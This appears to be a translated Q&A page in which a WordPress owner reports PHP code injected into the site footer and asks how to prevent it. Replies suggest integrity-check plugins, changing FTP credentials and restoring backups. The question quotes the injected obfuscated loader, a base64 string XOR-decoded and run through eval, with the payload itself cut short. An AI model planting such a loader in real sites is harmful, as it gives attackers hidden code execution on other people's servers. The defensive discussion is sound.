Wordpress php注入黑客_Php_Wordpress

Wordpress php注入黑客

php wordpress

Wordpress php注入黑客,php,wordpress,Php,Wordpress,我的wordpress安装遭到攻击，黑客将php代码注入我的页脚代码如下： <?php /* 5pJQhrPh3XJCUOiaQCa6 */ ?><?php $encoded = "ch0KCh..."; $raw = base64_decode($encoded); $res = ''; for ($i = 0; $i < strlen($raw); $i++) { $res .= chr(ord($raw[$i]) ^ ord('x')); } eval($

我的wordpress安装遭到攻击，黑客将php代码注入我的页脚

代码如下：

<?php /* 5pJQhrPh3XJCUOiaQCa6 */ ?><?php
$encoded = "ch0KCh...";
$raw = base64_decode($encoded);
$res = '';
for ($i = 0; $i < strlen($raw); $i++) {
    $res .= chr(ord($raw[$i]) ^ ord('x'));
}
eval($res)
?>
<?php /* uqjsQSyWVhmOHAEVa1i6 */ ?>

我想知道防止此类注射的解决方案？我正在运行最新版本的wordpress。

插件，可以帮助被黑客入侵的Wordpres网站

忍者：检查文件的完整性
iThemes安全：有一个“暴力保护”选项

帮助被黑客入侵的Wordpres网站的插件

忍者：检查文件的完整性
iThemes安全：有一个“暴力保护”选项

删除页脚，了解他是如何注入代码的！可能是恶意插件或主题？首先更改FTP凭据。然后通过FTP下载所有wordpress文件，并查找根工具包或类似的东西。wordpress存储库中的某些地方将是不属于wordpress的文件。这种恶意软件总是会在wordpress文件中写入一些代码。如果您有备份，请在更改ftp凭据后删除ftp帐户中的所有文件并上载备份。确保您在WordPress和ftp中都有一个强密码。他可以访问其中任何一个并以这种方式注入代码。删除页脚，找出他是如何注入代码的！可能是恶意插件或主题？首先更改FTP凭据。然后通过FTP下载所有wordpress文件，并查找根工具包或类似的东西。wordpress存储库中的某些地方将是不属于wordpress的文件。这种恶意软件总是会在wordpress文件中写入一些代码。如果您有备份，请在更改ftp凭据后删除ftp帐户中的所有文件并上载备份。确保您在WordPress和ftp中都有一个强密码。他可以访问其中任何一个，并以这种方式注入代码。